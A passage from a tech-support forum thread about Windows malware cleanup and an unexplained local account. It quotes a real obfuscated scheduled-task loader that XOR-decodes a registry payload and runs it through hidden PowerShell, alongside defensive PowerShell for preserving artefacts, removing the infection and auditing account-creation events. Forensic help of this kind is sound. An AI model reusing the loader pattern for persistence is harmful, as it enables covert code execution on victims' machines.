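Task: {34C46FA8-19E5-4D6A-A5E0-987A63C380DD} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
'@ -split "`r?`n"

Find-SuspiciousFrstTask -Lines $sample | Format-List
```

The Dropbox and Defender lines are in the sample as negatives: a signed vendor binary with no arguments trips none of the rules. A "(No File)" orphan such as AutoKMS still gets listed, because a task whose target has vanished is worth a look even when it turns out to be leftover from an uninstall; the two entries under the Microsoft folder are the ones that collect several reasons at once.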

domy_os 05.08.2023. 23:26

I would remove these:

Code:

Task: {AEAD4086-B489-47CE-B6C2-2959F4C3307D} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe (No File)
 
Task: {AE1B71B5-723A-4C61-9176-E0447C7D16C6} - System32\Tasks\Microsoft\Windows\Live\025Mp7ajtIGb => C:\WINDOWS\system32\wscript.exe [170496 2021-09-14] (Microsoft Windows -> Microsoft Corporation) -> C:\WINDOWS\System32\q5wPl.js /b <==== ATTENTION

Task: {72B09958-4276-4FB8-902F-C0A5D97622C7} - System32\Tasks\Microsoft\Windows\Management\Provisioning\JHTFCtmf\E9C9F0D0-30A9-4942-B4FF-B5648160F764 => C:\WINDOWS\system32\cmd.exe [289792 2021-01-13] (Microsoft Windows -> Microsoft Corporation) -> /c echO iEx "iCm ([sCRipTblock]::cREATE([StrING]::JOin('', ((get-iteMPropeRty -pATh 'hKlm:\SofTware\MinnetOnKA auDio SofTwareJhTfCtMFr').'jHTFctMfrmH' | % { [ChAr](`$_ -Bxor 201) }))))" | POWERsHELl -wINDoWSTyLE HiDdEN

And I'd disable these; re-enable them if you get sound problems:

Code:

Task: {6DE6F7EF-B1C1-4557-8AF0-0F38DB348395} - System32\Tasks\NahimicSvc32Run => C:\Windows\SysWOW64\NahimicSvc32.exe [833688 2021-11-01] (A-Volute SAS -> Nahimic)

Task: {C6CC0EEB-5664-4B80-B25B-C44066678B6A} - System32\Tasks\NahimicSvc64Run => C:\Windows\System32\NahimicSvc64.exe [1094808 2021-11-01] (A-Volute SAS -> Nahimic)
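
Before the three tasks go, it is worth keeping what they ran, because the cmd.exe task decodes its real payload from the registry at run time and nothing of it survives on disk once the key is deleted. The script below is an added example, not part of domy_os's advice: it re-implements the task's XOR-201 decoder but returns the plaintext instead of feeding it to Invoke-Expression, saves the decoded stage, the dropped q5wPl.js and the task definitions as XML with SHA-256 hashes, and then removes the tasks, the registry key and the file. The registry key, value name, XOR key, file path and task paths are copied from the FRST lines above (the key path is kept as FRST printed it, with no backslash before the random suffix, so confirm it with reg query first); the function names and the output folder are this example's own. Removal runs with -WhatIf until the switch is dropped.

```powershell
# Added example, not domy_os's advice or anything from the thread: preserve, then remove.
# Identifiers are copied from the FRST lines above; function names and $OutDir are assumptions.

# Hive/Software part normalised; the rest is exactly as FRST printed it, including the missing
# backslash before JhTfCtMFr (registry paths are case-insensitive). Verify with reg query first.
$KeyPath   = 'HKLM:\SOFTWARE\MinnetOnKA auDio SofTwareJhTfCtMFr'
$ValueName = 'jHTFctMfrmH'
$XorKey    = 201
$DropFile  = 'C:\WINDOWS\System32\q5wPl.js'
$TaskPaths = '\Microsoft\Windows\Management\Provisioning\JHTFCtmf\E9C9F0D0-30A9-4942-B4FF-B5648160F764',
             '\Microsoft\Windows\Live\025Mp7ajtIGb',
             '\AutoKMS'
$OutDir    = Join-Path $env:USERPROFILE 'Desktop\ir-artifacts'   # assumed output folder

function ConvertFrom-XorRegistryBlob {
    # The task's decoder minus the Invoke-Expression: XOR every element with $Key, join into text.
    param([string]$Path, [string]$Name, [int]$Key)
    $raw = (Get-ItemProperty -LiteralPath $Path -Name $Name -ErrorAction Stop).$Name
    # REG_BINARY comes back as byte[]; a string value is handled by XOR-ing its character codes
    $codes = if ($raw -is [string]) { [int[]][char[]]$raw } else { [int[]]$raw }
    -join ($codes | ForEach-Object { [char]($_ -bxor $Key) })
}

function Get-TaskByPath([string]$FullPath) {
    # '\Folder\Sub\Name' -> TaskPath '\Folder\Sub\', TaskName 'Name' ('\Name' -> '\', 'Name')
    $i = $FullPath.LastIndexOf('\')
    Get-ScheduledTask -TaskPath $FullPath.Substring(0, $i + 1) -TaskName $FullPath.Substring($i + 1) -ErrorAction SilentlyContinue
}

function Save-Artifacts {
    New-Item -ItemType Directory -Path $OutDir -Force | Out-Null
    # 1. Decoded next stage, saved as .txt so nothing executes it by accident
    try {
        ConvertFrom-XorRegistryBlob -Path $KeyPath -Name $ValueName -Key $XorKey |
            Set-Content -LiteralPath (Join-Path $OutDir 'decoded_stage.ps1.txt') -Encoding UTF8
    } catch { Write-Warning "Could not read $KeyPath\$ValueName : $_" }
    # 2. The dropped script
    if (Test-Path -LiteralPath $DropFile) { Copy-Item -LiteralPath $DropFile -Destination $OutDir }
    # 3. The task definitions as XML
    foreach ($tp in $TaskPaths) {
        $task = Get-TaskByPath $tp
        if ($task) { Export-ScheduledTask -InputObject $task | Set-Content -LiteralPath (Join-Path $OutDir "$($task.TaskName).xml") }
    }
    # 4. Hashes for the case notes
    Get-ChildItem -LiteralPath $OutDir -File | ForEach-Object { "$($_.Name)  SHA256 $((Get-FileHash -LiteralPath $_.FullName).Hash)" }
}

function Remove-Infection {
    [CmdletBinding(SupportsShouldProcess)]
    param()
    foreach ($tp in $TaskPaths) {
        $task = Get-TaskByPath $tp
        if ($task -and $PSCmdlet.ShouldProcess($tp, 'Unregister scheduled task')) {
            $task | Unregister-ScheduledTask -Confirm:$false
        }
    }
    if ((Test-Path -LiteralPath $KeyPath) -and $PSCmdlet.ShouldProcess($KeyPath, 'Remove registry key')) {
        Remove-Item -LiteralPath $KeyPath -Recurse -Force
    }
    if ((Test-Path -LiteralPath $DropFile) -and $PSCmdlet.ShouldProcess($DropFile, 'Delete file')) {
        Remove-Item -LiteralPath $DropFile -Force
    }
}

Save-Artifacts
Remove-Infection -WhatIf    # run again without -WhatIf once the artefact listing looks right
```

The decoded stage is what to read before calling the machine clean: it tells you what the loader fetched or ran, and therefore whether passwords saved in the browser or elsewhere on this PC need changing. The .js in System32 and the task under a Microsoft folder both required admin rights to plant, so whatever installed this ran elevated.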


geronimo_2 05.08.2023. 23:34

Guys, ESET has started blocking the link to this thread. It reports some trojan. I'm guessing it's because of all the code above, so it's freaking out :stoopid:

spiderhr 10.01.2024. 09:38

Ugh, it annoys me that I can't open a second File Explorer once I've opened one; I have to use Ctrl+N. Is there some hack to get around that? They really made a mess of it.

kopija 10.01.2024. 10:08

Quote:

Originally posted by spiderhr (Post 3721200)
Ugh, it annoys me that I can't open a second File Explorer once I've opened one; I have to use Ctrl+N. Is there some hack to get around that? They really made a mess of it.


And how would you like to open it?

By the power of thought?

spiderhr 10.01.2024. 10:09

Quote:

Originally posted by kopija (Post 3721204)
And how would you like to open it?

By the power of thought?

The way it used to be. An icon in the taskbar: you opened it, and with the same icon you could open a second one, a third...

Anyway, the grouping option is the first thing I turn off, because I don't like working that way.

udarnik60 10.01.2024. 10:13

Quote:

Originally posted by spiderhr (Post 3721205)
The way it used to be. An icon in the taskbar: you opened it, and with the same icon you could open a second one, a third...


Anyway, the grouping option is the first thing I turn off, because I don't like working that way.

Doesn't Win + E open a new one for you? Or a middle click on the icon in the taskbar?

Sent from my motorola edge 40 using Tapatalk

spiderhr 10.01.2024. 10:40

Meh... too many clicks, plus I have to take my hand off the mouse. The Win + E thing does open one.

I just wanted to be able to open the shortcuts I already have in the taskbar multiple times with the mouse. Oh well, Linux has spoiled me, and up to W7 everything was normal, until they started pulling stunts with the interface as if that were better.

Edit: I'm grumbling at Windows a bit. Better at Windows than at my colleagues.

mkey 11.01.2024. 20:09

A middle click on the taskbar icon should open another window, whatever application it is (as long as it allows multiple instances).

Neo-ST 11.02.2024. 14:19

Folks, out of the blue a "user1" has appeared on my Windows.
Last night everything was normal; I shut the PC down, went to bed, turned it on today and was greeted by the login menu asking which user I want to log into Windows with, my default one or this user1.
If I click on user1, it asks for a password. Wtf.

I log into mine, and in Settings under Users I see this:

https://i.postimg.cc/64pbkKxL/Image-007.png

Is it possible that some Windows update created that user?

EDIT:
I had to go into safe mode, run cmd as admin, "net user user1 /del" to delete that account.
After that a normal boot into Windows, then run netplwiz again and untick "users must enter username and password to log in to this computer", because without that it still stopped me at the login screen after boot.

Bravo Microsoft, bravo.

mkey 12.02.2024. 18:39

It's a bit suspicious that Windows created that account.

domy_os 12.02.2024. 20:05

https://www.ultimatewindowssecurity....x?eventid=4720
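
Event 4720 is the right place to start. As an added example (not from the posts above), the function below pulls the account-management events Windows writes for a new local user (4720 created, 4722 enabled, 4724 password set, 4728/4732 added to a group, 4738 changed) for a given account name over the last N days, shows who did it and from which logon session, and matches the group-membership events by the new account's SID rather than its name. The name 'user1' comes from Neo-ST's post; the function name and the 30-day default are this example's own. Run it elevated, and before the Security log rolls over.

```powershell
# Added example, not from the forum posts: who created 'user1', when, and from which session.
# Needs an elevated prompt and a Security log that still covers the relevant days.
# The function name and the 30-day default are this example's own assumptions.

function Get-AccountManagementEvents {
    param(
        [string]$Account = 'user1',   # account name from the post above
        [int]$Days = 30
    )
    # Event IDs Microsoft documents for local account management
    $ids = 4720, 4722, 4724, 4728, 4732, 4738
    $filter = @{ LogName = 'Security'; Id = $ids; StartTime = (Get-Date).AddDays(-$Days) }

    $events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # Lift the named EventData fields out of the event XML into a hashtable
        $xml = [xml]$_.ToXml()
        $d = @{}
        foreach ($node in $xml.Event.EventData.Data) { $d[$node.Name] = $node.'#text' }
        [pscustomobject]@{
            Time       = $_.TimeCreated
            Id         = $_.Id
            Target     = $d['TargetUserName']   # the user (4720/4722/4724/4738) or the group (4728/4732)
            TargetSid  = $d['TargetSid']
            MemberSid  = $d['MemberSid']        # 4728/4732 only: SID of the account that was added
            Actor      = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
            ActorLogon = $d['SubjectLogonId']   # match against 4624 to see how the actor logged on
        }
    }

    # SID(s) the account received at creation, so group-add events can be matched by SID
    $sids = @($events | Where-Object { $_.Id -eq 4720 -and $_.Target -eq $Account } | ForEach-Object { $_.TargetSid })

    $events |
        Where-Object { $_.Target -eq $Account -or ($_.MemberSid -and $sids -contains $_.MemberSid) } |
        Sort-Object Time
}

Get-AccountManagementEvents -Account 'user1' -Days 30 | Format-Table -AutoSize

# Current state of local accounts and the Administrators group, to compare with what the log says
Get-LocalUser | Select-Object Name, Enabled, PasswordLastSet, LastLogon, SID | Format-Table -AutoSize
Get-LocalGroupMember -Group 'Administrators' | Select-Object Name, PrincipalSource | Format-Table -AutoSize
```

The Actor and ActorLogon columns are what settle mkey's point: an account created by Windows setup or an update shows up under SYSTEM or an installer's session, while one created by a person or a tool acting under a user logon carries that user's name and a logon ID you can follow into the 4624 event of that session (logon type 10 for RDP, 2 for the console, 5 for a service). A 4732 adding the new SID to Administrators is the line that turns "odd" into "incident".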


All times are GMT +2. The time now is 09:09.

Powered by vBulletin®
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
© 1999-2023 PC Ekspert - All rights reserved ISSN 1334-2940
Ad Management by RedTyger